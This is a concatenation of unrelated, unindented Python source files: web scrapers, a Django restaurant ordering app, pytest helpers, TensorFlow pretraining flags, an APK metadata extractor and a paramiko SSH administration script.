headliners = soup.find_all('h3', class_='title')
for headliner in headliners:
name = headliner.find('a')
headliner_array.append(name.text)
# select date and add to array
dates = soup.find_all('div', class_="date presented-by")
for date in dates:
time = date['aria-label']
date_array.append(time)
# # select link and add to array
# links = soup.find_all('a', class_="button-round event-list-ticket-link") #### link needs work here #####
# for link in links:
# link_array.append(str(link['href']).strip())
# iterate through arrays and add to json object
i = 0
while(i < len(date_array)):
data.append("Venue Website", "Microsoft Theater", headliner_array[i], date_array[i], "link_array[i]")
i+=1
return
# Scrape The Novo by Microsoft ######################################################################################################
def novo(driver, data):
driver.get('https://www.thenovodtla.com/events/all')
# get the source html
html = driver.page_source
# render all JS and stor as static html
soup = BeautifulSoup(html, "html.parser")
# create arrays to fill with data
venue_array = []
headliner_array = []
date_array = []
link_array = []
# select headliner and add to array
headliners = soup.find_all('h3', class_="carousel_item_title_small")
for headliner in headliners:
head = headliner.find('a')
headliner_array.append(strip(head.text))
# select date and add to array
dates = soup.find_all('span', class_="date")
for date in dates:
date = strip(date.text)
date = format_date(date, "novo")
date_array.append(date)
# select link and add to array
links = soup.find_all('div', class_="buttons")
for link in links:
a = link.find('a')
link_array.append(a['href'])
# iterate through arrays and add to json object
i = 0
while(i < len(headliner_array)):
data.append("Venue Website", "The Novo by Microsoft", headliner_array[i], date_array[i], link_array[i])
i+=1
return
# Scrape Shrine Auditorium ##########################################################################################################
def shrine(driver, data):
driver.get('https://www.shrineauditorium.com/events/all')
# get the source html
html = driver.page_source
# render all JS and stor as static html
soup = BeautifulSoup(html, "html.parser")
# create arrays to fill with data
venue_array = []
headliner_array = []
date_array = []
link_array = []
# select headliner and add to array
headliners = soup.find_all('h3')
for headliner in headliners:
head = headliner.find('a')
headliner_array.append(str(head.text).strip())
# select date and add to array
dates = soup.find_all('h4', class_='date')
for date in dates:
date = format_date(strip(date.text), "shrine")
date_array.append(date)
# select link and add to array
links = soup.find_all('div', class_="buttons span pull-right")
for link in links:
a = link.find_all('a')[1]
link_array.append(a['href'])
# iterate through arrays and add to json object
i = 0
while(i < len(headliner_array)):
data.append("Venue Website", "Shrine Auditorium", headliner_array[i], date_array[i], link_array[i])
i+=1
return
# Scrape STAPLES Center #############################################################################################################
def staples(driver, data):
driver.get('https://www.staplescenter.com/events/all')
# get the source html
html = driver.page_source
# render all JS and stor as static html
soup = BeautifulSoup(html, "html.parser")
# create arrays to fill with data
venue_array = []
headliner_array = []
date_array = []
link_array = []
# select headliner and add to array
headliners = soup.find_all('h3', class_='title')
for headliner in headliners:
headliner_array.append(str(headliner.text).strip())
# select date and add to array ##### this date needs a bunch of work #########
dates = soup.find_all('div', class_='date')
for date in dates:
date = date['aria-label']
date_array.append(date)
# more_info = len(driver.find_elements_by_css_selector("title.More Info"))
# for info_num in range(1,more_info):
# # day = date.find('div')
# # date = day['aria-label']
# # date_array.append(date)
# # get the source html
# # click on each more info link
# # search = info.find_elements_by_tag_name('h3')
# driver.find_elements_by_css_selector('title.More Info')[info_num].click()
# html = driver.page_source
# # render all JS and stor as static html
# soup = BeautifulSoup(html, "html.parser")
# # iterate through dates and append
# dates = soup.find_all('span', class_='cell')
# for date in dates:
# date = date['aria-label']
# date_array.append(date)
# driver.back()
# select link and add to array
links = soup.find_all('div', class_='buttons')
for link in links:
try:
a = link.find('a')['href']
link_array.append(str(a))
except:
link_array.append("tbd")
# iterate through arrays and add to json object
i = 0
while(i < len(date_array)):
data.append("Venue Website", "STAPLES Center", headliner_array[i], date_array[i], link_array[i])
i+=1
return
# Scrape Grammy Museum ##############################################################################################################
def grammy(driver, data):
return
#####################################################################################################################################
#####################################################################################################################################
# Main #
#####################################################################################################################################
def main():
# create json instance
global data
data = JsonInstance([])
global driver
chrome_options = Options()
chrome_options.add_argument("--headless")
chrome_options.add_argument("--disable-extensions")
chrome_options.add_argument("--disable-dev-shm-usage")
chrome_options.add_argument("--disable-gpu")
chrome_options.add_argument("--no-sandbox")
driver = webdriver.Chrome('./chromedriver', options=chrome_options)
# collect data from each website
SB(driver, data)
fonda(driver, data)
forum(driver, data)
greekLA(driver, data)
greekBerkley(driver, data)
hollywood(driver, data)
honda(driver, data)
microsoft(driver, data)
novo(driver, data)
shrine(driver, data)
staples(driver, data)
# grammy(driver, data)
# output to json file
data.output("venueSitesData.json")
# close the connection
driver.close()
if __name__ == "__main__":
main()
exit(0)
|
995,207 | fffee74b2071a10a598e32cf4ffb639300047ac4 | #COMP 123-04 HW 1
#,richard_graham>
#PART ONE
width = 75
height = 125
area = width*height
print(area)
#PART TWO
width = int(input("Enter a width"))
height = int(input("Enter a height"))
area2 = width*height
print(area2)
#PART THREE
import turtle
bob = turtle.Turtle()
win = turtle.Screen()
bob.color('red')
bob.down()
for i in range(2):
bob.forward(width)
bob.right(90)
bob.forward(height)
bob.right(90)
win.exitonclick() |
995,208 | 484dd1ec82c070301890c0a698ef917a492d4b6d | import json
import re
from dataclasses import dataclass
from pathlib import Path
from shutil import rmtree
from typing import Callable
import processor
import pytest
CONFIG_NAME = ".defects4cpp.json"
@dataclass
class TestDirectory:
project: str
checkout_dir: Path
fixed_target_dir: Path
fixed_output_dir: Path
buggy_target_dir: Path
buggy_output_dir: Path
__test__ = False
@pytest.fixture(scope="function", autouse=True)
def cleanup(tmp_path: Path):
yield
rmtree(tmp_path)
@pytest.fixture
def defect_path(tmp_path: Path, request) -> Callable[[int, int], TestDirectory]:
def create_defect_path(index: int, case: int) -> TestDirectory:
# test_PROJECT_NAME
regex = re.compile(r"test_(.*)\[.*\]")
project = regex.match(request.node.name).groups()[0]
d = tmp_path / request.node.name
d.mkdir()
return TestDirectory(
project,
d,
fixed_target_dir=(d / project / f"fixed#{index}"),
fixed_output_dir=(d / f"{project}-fixed#{index}-{case}"),
buggy_target_dir=(d / project / f"buggy#{index}"),
buggy_output_dir=(d / f"{project}-buggy#{index}-{case}"),
)
return create_defect_path
def checkout_dir_valid(d: Path) -> bool:
return (d / CONFIG_NAME).exists()
def read_captured_output(d: Path, case: int) -> str:
with open(d / f"{case}.output") as fp:
test_output = fp.readlines()
return " ".join(test_output)
def should_pass(d: Path, case: int) -> bool:
with open(d / f"{case}.test") as fp:
test_result = fp.readline()
return test_result == "passed"
def should_fail(d: Path, case: int) -> bool:
with open(d / f"{case}.test") as fp:
test_result = fp.readline()
return test_result == "failed"
def should_create_gcov(d: Path):
gcov_files = list(d.glob("*.gcov"))
# TODO: validate contents of gcov?
return len(gcov_files) > 0
def should_create_summary_json(d: Path):
with open(d / f"summary.json") as fp:
summary_json = json.load(fp)
return len(summary_json["files"]) > 0
def validate_taxonomy(test_dir: TestDirectory, index: int, case: int):
checkout = processor.CheckoutCommand()
build = processor.BuildCommand()
test = processor.TestCommand()
# Test fix
fixed_target_dir = test_dir.fixed_target_dir
checkout(
f"{test_dir.project} {index} --target {str(test_dir.checkout_dir)}".split()
)
assert checkout_dir_valid(fixed_target_dir)
build(f"{str(fixed_target_dir)} --coverage".split())
test(
f"{str(fixed_target_dir)} --coverage --case {case} --output-dir {str(test_dir.checkout_dir)}".split()
)
fixed_output_dir = test_dir.fixed_output_dir
assert should_pass(fixed_output_dir, case), read_captured_output(
fixed_output_dir, case
)
assert should_create_gcov(fixed_output_dir)
assert should_create_summary_json(fixed_output_dir)
# Test buggy
buggy_target_dir = test_dir.buggy_target_dir
checkout(
f"{test_dir.project} {index} --buggy --target {str(test_dir.checkout_dir)}".split()
)
assert checkout_dir_valid(buggy_target_dir)
build(f"{str(buggy_target_dir)} --coverage".split())
test(
f"{str(buggy_target_dir)} --coverage --case {case} --output-dir {str(test_dir.checkout_dir)}".split()
)
buggy_output_dir = test_dir.buggy_output_dir
assert should_fail(buggy_output_dir, case), read_captured_output(
buggy_output_dir, case
)
assert should_create_gcov(buggy_output_dir)
assert should_create_summary_json(buggy_output_dir)
|
995,209 | 6a499487e07c79f28776afe70cb5cbd991168159 | import json
import tensorflow as tf
flags = tf.flags
FLAGS = flags.FLAGS
# main operation argument
flags.DEFINE_string('op', None, '[REQUIRED] Operation code to do')
flags.mark_flag_as_required('op')
# create pretrain data
flags.DEFINE_string("input_file", None, "Input raw text file (or comma-separated list of files).")
flags.DEFINE_string("output_file", None, "Output TF example file (or comma-separated list of files).")
flags.DEFINE_string("vocab_file", None, "The vocabulary file that the electra-albert model was trained on.")
flags.DEFINE_string("spm_model", None, "sentencepiece model file")
flags.DEFINE_string("mecab_file", None, "mecab file")
flags.DEFINE_bool("parallel",
False,
"Option to use multiprocess to speed up make tfrecord wokring with multiple raw files."
"output files will be written next to input files if non are passed.")
flags.DEFINE_bool("do_lower_case",
True,
"Whether to lower case the input text. Should be True for uncased "
"models and False for cased models.")
flags.DEFINE_bool("do_whole_word_mask",
False,
"Whether to use whole word masking rather than per-WordPiece masking.")
flags.DEFINE_integer("max_seq_length", 512, "Maximum sequence length.")
flags.DEFINE_integer("max_predictions_per_seq", 20, "Maximum number of masked LM predictions per sequence.")
flags.DEFINE_integer("random_seed", 12345, "Random seed for data generation.")
flags.DEFINE_integer("dupe_factor", 1, "Number of times to duplicate the input data (with different masks).")
flags.DEFINE_float("masked_lm_prob", 0.15, "Masked LM probability.")
flags.DEFINE_float("short_seq_prob",
0.1,
"Probability of creating sequences which are shorter than the maximum length.")
# pretrain
flags.DEFINE_string("config_file", None, "The config json specifies the model architecture.")
flags.DEFINE_string('data_home_dir', None, "Path to input directory.")
flags.DEFINE_string('checkpoint_dir', None, '')
flags.DEFINE_string('tokenizer_dir', None, '')
flags.DEFINE_integer('gpu_num', None, 'target GPU number')
flags.DEFINE_float('gpu_usage', None, 'use of GPU process memory limit')
# crawler
tf.flags.DEFINE_string('category', None, 'Name of category')
tf.flags.DEFINE_string('config_path', 'configs', 'directory of config file')
tf.flags.DEFINE_string('config_file', 'category.json', 'config file name')
tf.flags.DEFINE_string('id', None, 'mongodb id')
tf.flags.DEFINE_string('passwd', None, 'mongodb password')
def main(_):
if FLAGS.op == 'create_pretrain':
import util.create_pretraining_data as cp
flags.mark_flag_as_required("input_file")
flags.mark_flag_as_required("output_file")
flags.mark_flag_as_required("vocab_file")
cp.run()
elif FLAGS.op == 'pretrain':
from src.pretrain import PretrainModel
model = PretrainModel(FLAGS.tokenizer_dir,
FLAGS.config_file,
FLAGS.data_home_dir,
FLAGS.op,
FLAGS.checkpoint_dir,
FLAGS.gpu_num,
FLAGS.gpu_usage,
is_training=True)
elif FLAGS.op == 'create_finetune':
pass
elif FLAGS.op == 'finetune':
pass
elif FLAGS.op == 'crawler':
from util.db_util import MongoController
from util.crawler.naver_crawler import NaverShoppingCrawler
category_dic_path = f'{FLAGS.config_path}/{FLAGS.config_file}'
with open(category_dic_path, 'r') as f:
category_dic = json.loads(f.read())
category_name = FLAGS.category
category_id = category_dic.get(category_name, None)
crawler = NaverShoppingCrawler(category_name, 60)
db = MongoController(FLAGS.id, FLAGS.passwd)
for page_num in range(1, 50):
url = 'https://search.shopping.naver.com/api/search/category?sort=rel&pagingIndex={}&pagingSize=40&viewType=list&productSet=total&catId={}&deliveryFee=&deliveryTypeValue=&iq=&eq=&xq=&frm=NVSHTTL&window='
url = url.format(page_num, category_id)
meta_list, sub_url_list, date_list = crawler.parse_main_html(url)
if len(date_list) == 0: break
for idx in range(len(sub_url_list)):
comment_list = crawler.parse_sub_html(sub_url_list[idx], meta_list[idx]['name'])
if (len(comment_list) == 0) or (comment_list == None):
continue
db.insert_data(comment_list, 'review')
time.sleep(random.randint(10, 30))
db.insert_data(meta_list, FLAGS.category)
if __name__ == '__main__':
tf.compat.v1.app.run()
|
995,210 | 9746b03696523da8da7aa397e04eddd5a93a7b97 | from django.test import TestCase
# Create your tests here.
with open("img/1.jpg", 'rb') as file:
file_data = file.read()
print(file_data)
|
995,211 | 754775495d2574cf5529a632d632ce8497a153a1 | # Create your views here.
from django.shortcuts import render, get_object_or_404, redirect
from django.urls import reverse_lazy
from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin
from django.views.generic.list import ListView
from django.views.generic.edit import CreateView, UpdateView, DeleteView, FormView
from django.views.generic.detail import DetailView
from django.views import View
# Create your views here.
from .models import *
from users.models import *
from .mixins import *
from .forms import *
class Index(View):
"""Index.
TODO: Show the initial page for unauthenticated user
"""
template = "restaurante/index.html"
def get(self, request):
return render(request, self.template)
class Menu(LoginRequiredMixin,ListView):
"""Menu.
TODO: Show the full menu
"""
model = Category
template_name = 'restaurante/menu.html'
login_url = 'users:login'
class CategoryView(LoginRequiredMixin,ListView):
"""Category.
TODO: Show all the elements of one category of the menu
"""
model = Element
template_name = 'restaurante/category_menu.html'
login_url = 'users:login'
def get_queryset(self):
return super().get_queryset().filter(category_id = self.kwargs.get('pk'))
def get_context_data(self, *args, **kwargs):
form = AddToCartForm()
context = super().get_context_data(*args, **kwargs)
context['category_name'] = Category.objects.get(id = self.kwargs.get('pk'))
context['form'] = form
return context
class Elements(AdminOnlyMixin,ListView):
"""Elements.
TODO: Show a list of all elements
"""
login_url = 'users:login'
model = Element
template_name = 'restaurante/element_list.html'
class Categorys(AdminOnlyMixin,ListView):
"""Categorys.
TODO: Show a list of all categorys
"""
login_url = 'users:login'
model = Category
template_name = 'restaurante/category_list.html'
class ElementCreate(AdminOnlyMixin, CreateView):
"""Create Element.
TODO: Add new element
"""
login_url = 'users:login'
model = Element
fields = '__all__'
labels = {
'name' : 'Nombre'
}
title = 'Crear Platillo'
success_url = reverse_lazy('restaurante:elements_admin')
class ElementUpdate(AdminOnlyMixin, UpdateView):
"""Update Element.
TODO: Make changes in an Element
"""
login_url = 'users:login'
model = Element
fields = '__all__'
title = 'Editar Platillo'
success_url = reverse_lazy('restaurante:elements_admin')
class ElementDelete(AdminOnlyMixin, DeleteView):
"""Delete Element.
TODO: Delete an Element
"""
login_url = 'users:login'
model = Element
success_url = reverse_lazy('restaurante:elements_admin')
class CategoryCreate(AdminOnlyMixin, CreateView):
"""Create Category.
TODO: Add new category
"""
login_url = 'users:login'
model = Category
fields = '__all__'
title = 'Crear Categoria'
success_url = reverse_lazy('restaurante:categorys_admin')
class CategoryUpdate(AdminOnlyMixin, UpdateView):
"""Update Category.
TODO: Make changes in a Category
"""
login_url = 'users:login'
model = Category
fields = '__all__'
title = 'Editar Categoria'
success_url = reverse_lazy('restaurante:categorys_admin')
class CategoryDelete(AdminOnlyMixin, DeleteView):
"""Delete Category.
TODO: Delete a Category
"""
login_url = 'users:login'
model = Category
success_url = reverse_lazy('restaurante:categorys_admin')
class CartView(LoginRequiredMixin, ListView):
"""Cart View.
TODO: Show all the elements of the current user cart
"""
model = OrderElement
template_name = 'restaurante/cart.html'
login_url = 'users:login'
def get_queryset(self):
cart, is_new_cart = Order.objects.get_or_create(customer = self.request.user, state = 'CT')
return cart.order_elems.all()
def get_context_data(self, *args, **kwargs):
context = super().get_context_data(*args, **kwargs)
cart, is_new_cart = Order.objects.get_or_create(customer = self.request.user, state = 'CT')
context['flag_cart'] = not cart.is_empty()
context['cart_id'] = cart.id
context['cart_total'] = cart.get_total()
return context
class AddToCart(LoginRequiredMixin, View):
"""Add To Cart.
TODO: Lets add an element to the cart
"""
template_name = 'restaurante/category_menu.html'
login_url = 'users:login'
def post(self,request,*args,**kwargs):
"""Receive and validate add to cart form."""
form = AddToCartForm(request.POST)
cart, is_new_cart = Order.objects.get_or_create(customer = request.user, state = 'CT')
element = Element.objects.get(id = self.kwargs.get('pk'))
context = {}
if form.is_valid():
quantity = form.cleaned_data.get("quantity")
cart.add_element(element,quantity)
context = {"form": form}
pk = element.category.id
return redirect( reverse_lazy('restaurante:category',kwargs={'pk': pk}))
class DeleteFromCart(LoginRequiredMixin,DeleteView):
"""Delete From Cart.
TODO: Lets delete an element from the cart
"""
login_url = 'users:login'
model = OrderElement
success_url = reverse_lazy('restaurante:cart')
def get(self, request, *args, **kwargs):
return super().delete(request, *args, **kwargs)
class OrderView(StaffOnlyMixin,DetailView):
"""Order.
TODO: Show the order information
"""
login_url = 'users:login'
model = Order
class MakeAnOrder(LoginRequiredMixin,UpdateView):
"""Make an order.
TODO: Allows confirm the order that is in the cart
"""
login_url = 'users:login'
model = Order
success_url = reverse_lazy('users:home')
form_class = MakeAnOrderForm
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
kwargs['request'] = self.request
return kwargs
def get(self, request, *args, **kwargs):
object = self.get_object()
if object.is_empty():
return redirect( reverse_lazy( 'restaurante:cart'))
return super().get(self, request, *args, **kwargs)
def form_valid(self, form):
obj = form.save(commit=False)
obj.state = 'PD'
obj.save()
return super().form_valid(form)
class MarkOrderReady(AdminOnlyMixin,View):
"""Mark order ready.
TODO: Allow mark an order as ready
"""
login_url = 'users:login'
success_url = reverse_lazy('restaurante:orders_pending')
def get(self, request, *args, **kwargs):
order = Order.objects.get(id = self.kwargs.get('pk'))
order.state = 'LT'
order.admin = self.request.user
order.save()
return redirect(self.success_url)
class MarkOrderOnWay(DeliveryManOnlyMixin,View):
"""Mark order on way.
TODO: Allow mark an order as on way
"""
login_url = 'users:login'
success_url = reverse_lazy('restaurante:orders_ready')
def get(self, request, *args, **kwargs):
order = Order.objects.get(id = self.kwargs.get('pk'))
order.state = 'EC'
order.delivery_man = self.request.user
order.save()
return redirect(self.success_url)
class MarkOrderDelivered(DeliveryManOnlyMixin,View):
"""Mark order delivered.
TODO: Allow mark an order as delivered
"""
login_url = 'users:login'
success_url = reverse_lazy('restaurante:orders_on_way')
def get(self, request, *args, **kwargs):
order = Order.objects.get(id = self.kwargs.get('pk'))
order.state = 'ET'
order.save()
return redirect(self.success_url)
class Orders(AdminOnlyMixin,ListView):
"""Orders.
TODO: Show a list of all orders
"""
login_url = 'users:login'
model = Order
template_name = 'restaurante/order_list.html'
def get_queryset(self):
return super().get_queryset().exclude(state = 'CT')
def get_context_data(self, *args, **kwargs):
context = super().get_context_data(*args, **kwargs)
context['title'] = 'Todas las ordenes'
return context
class PendingOrders(AdminOnlyMixin,ListView):
"""Pending Orders.
TODO: Show a list of orders in pending state
"""
login_url = 'users:login'
model = Order
template_name = 'restaurante/order_list.html'
def get_queryset(self):
return super().get_queryset().filter(state = 'PD')
def get_context_data(self, *args, **kwargs):
context = super().get_context_data(*args, **kwargs)
context['title'] = 'Ordenes Pendientes'
return context
class ReadyOrders(StaffOnlyMixin, ListView):
"""Ready Orders.
TODO: Show a list of orders in ready state
"""
login_url = 'users:login'
model = Order
template_name = 'restaurante/order_list.html'
def get_queryset(self):
return super().get_queryset().filter(state = 'LT')
def get_context_data(self, *args, **kwargs):
context = super().get_context_data(*args, **kwargs)
context['title'] = 'Ordenes Listas'
return context
class OnWayOrders(StaffOnlyMixin,ListView):
"""On Way Orders.
TODO: Show a list of orders in on way state
"""
login_url = 'users:login'
model = Order
template_name = 'restaurante/order_list.html'
def get_queryset(self):
queryset = super().get_queryset().filter(state = 'EC')
if self.request.user.is_delivery_man and not self.request.user.is_admin:
queryset = queryset.filter(delivery_man=self.request.user)
return queryset
def get_context_data(self, *args, **kwargs):
context = super().get_context_data(*args, **kwargs)
context['title'] = 'Ordenes En Camino'
return context
class DeliveredOrders(AdminOnlyMixin,ListView):
"""Delivered Orders.
TODO: Show a list of orders in delivered state
"""
login_url = 'users:login'
model = Order
template_name = 'restaurante/order_list.html'
def get_queryset(self):
queryset = super().get_queryset().filter(state = 'ET')
if self.request.user.is_delivery_man:
queryset = queryset.filter(delivery_man=self.request.user)
return queryset
def get_context_data(self, *args, **kwargs):
context = super().get_context_data(*args, **kwargs)
context['title'] = 'Ordenes Entregadas'
return context
|
995,212 | 01db578bd5d3dbc86a3238c9341d552c61c6be6c | # -*- coding: utf-8 -*-
# filename: handle.py
import web
import reply
import receive
class Html(object):
def GET(self, action):
try:
render = web.template.frender('templates/'+action)
return render();
except Exception as Argument:
return Argument
def POST(self):
try:
return 'POST'
except Exception as Argment:
return Argment
|
995,213 | 51325c56cdb9f253d1dcd7edca621a8c76700416 | #encoding:utf-8
#ๆๅก็ซฏ
#ๅฏผๅ
ฅsocketๆจกๅ
import socket
#ๅๅปบsocketๅฏน่ฑก
s = socket.socket()
#็ปๅฎ็ซฏๅฃ
s.bind(("127.0.0.1",4700))
#็ญๅพ
ๅฎขๆท็ซฏ่ฟๆฅ
s.listen(5)
while(True):
#ๅปบ็ซๅฎขๆท็ซฏ่ฟๆฅ
c,addr =s.accept()
print('่ฟๆฅๅฐๅ๏ผ',addr)
c.send(str.encode('s'))
#ๅ
ณ้ญ่ฟๆฅ
# c.close()
|
995,214 | 492f15e894e337d6f6fd6a93535725c094fac946 | import logging
from utils.db_base import *
from common import config
TABLE_NAME = 'roles'
LOG = logging.getLogger(__name__)
def set_complete(role_name):
update_table(TABLE_NAME,
{'state': 'completed'},
{'roleName': role_name,
'src_cloud': cfg.CONF.SOURCE.os_cloud_name,
'dst_cloud': cfg.CONF.TARGET.os_cloud_name},
False)
def set_error(role_name):
update_table(TABLE_NAME,
{'state': 'error'},
{'roleName': role_name,
'src_cloud': cfg.CONF.SOURCE.os_cloud_name,
'dst_cloud': cfg.CONF.TARGET.os_cloud_name},
False)
def initialise_roles_mapping(name_of_roles_to_move):
if not check_table_exist(TABLE_NAME):
print 'table not exist and create table'
table_columns = '''id INT NOT NULL AUTO_INCREMENT,
roleName VARCHAR(64) NOT NULL,
src_cloud VARCHAR(64) NOT NULL,
dst_cloud VARCHAR(64) NOT NULL,
state VARCHAR(10) NOT NULL,
PRIMARY KEY(id),
UNIQUE (roleName, src_cloud, dst_cloud)
'''
create_table(TABLE_NAME, table_columns, False)
s_cloud_name = cfg.CONF.SOURCE.os_cloud_name
t_cloud_name = cfg.CONF.TARGET.os_cloud_name
for role in name_of_roles_to_move:
if not existed(role):
record = "null, '"+role+"','"+s_cloud_name+"', '"+t_cloud_name+"', 'unknown'"
insert_record(TABLE_NAME, [record], False)
def existed(role_name):
filters = {
"roleName": role_name,
"src_cloud": cfg.CONF.SOURCE.os_cloud_name,
"dst_cloud": cfg.CONF.TARGET.os_cloud_name
}
data = read_record(TABLE_NAME, ["0"], filters, True)
return data
if __name__ == '__main__':
print 'empty roles table'
LOG.info('make roles table empty')
config.parse(['--config-file', '../../etc/flyway.conf'])
namelist = []
initialise_roles_mapping(namelist)
delete_all_data(TABLE_NAME)
|
995,215 | c557503ae959fb2f4136cf5b09001e4113136528 | class Solution:
def largestSumAfterKNegations(self, A: List[int], K: int) -> int:
A[A.index(min(A))] *= -1
if K == 1:
return sum(A)
else:
return self.largestSumAfterKNegations(A, K-1)
|
995,216 | f78920d6f477abbe6e5149676a27d31a87952f17 | class Valuable():
def __init__(self, v=0):
self.val = v
def getValue(self):
return self.val
def setValue(self):
self.val = int(input('Enter an integer: '))
def adder(x, y):
return (x + y)
if __name__ == "__main__":
val1 = Valuable()
val2 = Valuable()
val1.setValue()
val2.setValue()
print('Sum of numbers entered: ', adder(val1.getValue(), val2.getValue()))
|
995,217 | f427f556404c0afb5affb271d99f78b4a1273418 | XSym
0094
6b1a75c1ea9bf35b8046d391ebef7d19
/usr/local/Cellar/python/3.7.2_1/Frameworks/Python.framework/Versions/3.7/lib/python3.7/abc.py
|
995,218 | 47c9989c69707f38331b2520d03adc406f22e718 | from django.apps import apps
from django.conf import settings
import logging
from urllib.parse import quote
import random
import os
import json
logger = logging.getLogger(__name__)
def find_action_cls(app_name: str, action_codename: str):
"""
Get the PlatformAction subclass that has the specified codename
"""
from policyengine.models import PlatformAction
for cls in apps.get_app_config(app_name).get_models():
if issubclass(cls, PlatformAction) and hasattr(cls, "action_codename"):
if action_codename == getattr(cls, "action_codename"):
return cls
return None
def get_action_classes(app_name: str):
"""
Get a list of PlatformAction subclasses defined in the given app
"""
from policyengine.models import PlatformAction
actions = []
for cls in apps.get_app_config(app_name).get_models():
if issubclass(cls, PlatformAction) and hasattr(cls, "action_codename"):
actions.append(cls)
return actions
def construct_authorize_install_url(request, integration, community=None):
logger.debug(f"Constructing URL to install '{integration}' to community '{community}'.")
# Initiate authorization flow to install Metagov to platform.
# On successful completion, the Metagov Slack plugin will be enabled for the community.
# Redirect to the plugin-specific install endpoint, which will complete the setup process (ie create the SlackCommunity)
redirect_uri = f"{settings.SERVER_URL}/{integration}/install"
encoded_redirect_uri = quote(redirect_uri, safe='')
# store state in user's session so we can validate it later
state = "".join([str(random.randint(0, 9)) for i in range(8)])
request.session['community_install_state'] = state
# if not specified, metagov will create a new community and pass back the slug
community_slug = community.metagov_slug if community else ''
url = f"{settings.METAGOV_URL}/auth/{integration}/authorize?type=app&community={community_slug}&redirect_uri={encoded_redirect_uri}&state={state}"
logger.debug(url)
return url
def get_starterkits_info():
"""
Get a list of all starter-kit names and descriptions.
"""
starterkits = []
cur_path = os.path.abspath(os.path.dirname(__file__))
dir_path = os.path.join(cur_path, f'../starterkits')
for kit_file in os.listdir(dir_path):
kit_path = os.path.join(dir_path, kit_file)
f = open(kit_path)
data = json.loads(f.read())
starterkits.append({
'name': data['name'],
'description': data['description']
})
return starterkits
|
995,219 | c0c603e43b92328eadccb66bcb4ce830175f0e9b | # Original Dimensions
dimensions = (500,20)
for dimension in dimensions:
print (dimension)
# Save another Dimension
dimensions = (400,100)
# Another dimensions
for dimension in dimensions:
print(dimension)
|
995,220 | 316d5b37d80c476574a581255f17b55e9ab4dc87 | #! /usr/bin/env python
import hashlib
import json
from apkcli.plugins.base import Plugin
from apkcli.lib.utils import get_urls, get_intent_filers, convert_x509_name
class PluginJson(Plugin):
name = "json"
description = "Extract information on the APK in JSON format"
def add_arguments(self, parser):
self.parser = parser
def extract_new_permissions(self, permissions):
"""
Extract permissions that are not default in Android
"""
res = []
for p in permissions:
if p.startswith('android.permission'):
continue
if p.startswith('com.google'):
continue
if p.startswith('com.android'):
continue
res.append(p)
return res
def run(self, args, apk, d, dx):
res = {
'app_name': apk.get_app_name(),
'package_name': apk.get_package(),
'providers': apk.get_providers(),
'new_permissions': self.extract_new_permissions(apk.get_permissions()),
'filters': get_intent_filers(apk),
'certificate': {},
'wearable': apk.is_wearable(),
'max_sdk_version': (apk.get_max_sdk_version()),
'min_sdk_version': int(apk.get_min_sdk_version()) if apk.get_min_sdk_version() is not None else "",
'version_code': apk.xml['AndroidManifest.xml'].get('{http://schemas.android.com/apk/res/android}versionCode'),
'libraries': list(apk.get_libraries()),
'androidtv': apk.is_androidtv(),
'target_sdk_version': apk.get_target_sdk_version(),
'activities': apk.get_activities(),
'main_activity': apk.get_main_activity(),
'receivers': apk.get_receivers(),
'signature_name': apk.get_signature_name(),
'dexes': {},
'displayed_version': apk.xml['AndroidManifest.xml'].get('{http://schemas.android.com/apk/res/android}versionName'),
'services': apk.get_services(),
'permissions': apk.get_permissions(),
'urls': get_urls(apk),
}
# Certificate
if len(apk.get_certificates()) > 0:
cert = apk.get_certificates()[0]
res['certificate']['sha1'] = cert.sha1_fingerprint.replace(' ', '')
res['certificate']['serial'] = '{:X}'.format(cert.serial_number)
res['certificate']['issuerDN'] = convert_x509_name(cert.issuer)
res['certificate']['subjectDN'] = convert_x509_name(cert.subject)
res['certificate']['not_before'] = cert['tbs_certificate']['validity']['not_before'].native.strftime('%b %-d %X %Y %Z')
res['certificate']['not_after'] = cert['tbs_certificate']['validity']['not_after'].native.strftime('%b %-d %X %Y %Z')
# Dexes
dex_names = list(apk.get_dex_names())
dex_values = list(apk.get_all_dex())
for dex in range(len(dex_names)):
m = hashlib.sha256()
m.update(dex_values[dex])
res['dexes'][dex_names[dex][:-4]] = {
'sha256': m.hexdigest(),
}
print(json.dumps(res, indent=4, sort_keys=True))
|
995,221 | 35f5085c009a3d66829f71ac41ba3f2c1cb748a0 | import re
from rest_framework.exceptions import ValidationError
from rest_framework import serializers
from .models import User
from django.utils.translation import gettext_lazy as _
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ('id', 'username', 'first_name', 'last_name', 'email', 'phone', 'address', 'city')
read_only_fields = ('username',)
class CreateUserSerializer(serializers.ModelSerializer):
def create(self, validated_data):
# call create_user on user object. Without this
# the password will be stored in plain text.
user = User.objects.create_user(**validated_data)
return user
def validate_phone(self, value):
"""
Validates phone number of an organization using Regex
:param value: phone number
:return: value or raises ValidationError
"""
pattern = re.compile(r'(^[+0-9]{1,3})*([0-9]{8,15}$)', re.IGNORECASE)
value = value.replace(" ", "")
if pattern.match(value) is None:
raise ValidationError(_('Please insert correct phone number.'))
return value
class Meta:
model = User
fields = ('id', 'username', 'password', 'first_name', 'last_name', 'email', 'phone',
'address', 'city')
extra_kwargs = {'password': {'write_only': True}}
|
995,222 | bac54e603321dc9b57748b18295fe6bae312112e | #coding=utf-8
"""
test paramiko lib
"""
import paramiko
import os
#RSAๅฏ้ฅๆๆ็ปๅฝ
a = paramiko.SSHClient()
a.set_missing_host_key_policy(paramiko.AutoAddPolicy())
a.connect(hostname='192.168.64.129',port=22,username="root",key_filename="C:\\Users\\22950\\skey")
b,c,d = a.exec_command("ls")
print c.readlines()
e = a.open_sftp()
try:
e.stat("/home/adolph/Videos/11.txt")
print "ๅญๅจ"
a.exec_command("rm -rf xxxx.txt")
except Exception,e:
print "ๆไปถไธๅญๅจ"
a.close()
#ๅฏ็ ็ปๅฝ
# a = paramiko.SSHClient()
# a.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# a.connect(hostname='192.168.64.129',port=22,username="root",password="123456")
# b,c,d = a.exec_command("ls -al")
# print c.readlines()
#ไปLinuxๆๅกๅจ็ซฏไธ่ฝฝๆไปถ่ณๆฌๅฐ๏ผwindows๏ผ
"""
ๅฏ็ ๆ่
ๅฏ้ฅ็ปๅฝ
"""
# t = paramiko.Transport(("192.168.64.129",22))
# t.connect(username="root",pkey=paramiko.RSAKey.from_private_key_file("C:\\Users\\22950\\skey"))
